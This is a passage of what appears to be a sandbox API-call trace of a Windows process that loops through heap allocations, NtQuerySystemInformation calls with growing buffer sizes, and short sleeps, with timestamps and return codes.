dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.596] Sleep (dwMilliseconds=0x110) [0204.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.628] Sleep (dwMilliseconds=0x110) [0204.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.646] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.646] Sleep (dwMilliseconds=0x110) [0204.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.660] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.660] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.660] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.660] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.661] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.662] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.662] Sleep (dwMilliseconds=0x110) [0204.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.672] Sleep (dwMilliseconds=0x110) [0204.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.689] Sleep (dwMilliseconds=0x110) [0204.700] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.700] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.701] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.704] Sleep (dwMilliseconds=0x110) [0204.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.716] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.719] Sleep (dwMilliseconds=0x110) [0204.731] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.731] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.738] Sleep (dwMilliseconds=0x110) [0204.747] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.747] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.748] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.748] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.751] Sleep (dwMilliseconds=0x110) [0204.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.770] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.771] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.771] Sleep (dwMilliseconds=0x110) [0204.835] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.835] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.836] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.836] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.836] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.837] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.837] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.838] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.838] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.838] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.839] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.840] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.840] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.841] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.842] Sleep (dwMilliseconds=0x110) [0204.872] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.872] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.873] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.878] Sleep (dwMilliseconds=0x110) [0204.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.910] Sleep (dwMilliseconds=0x110) [0204.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 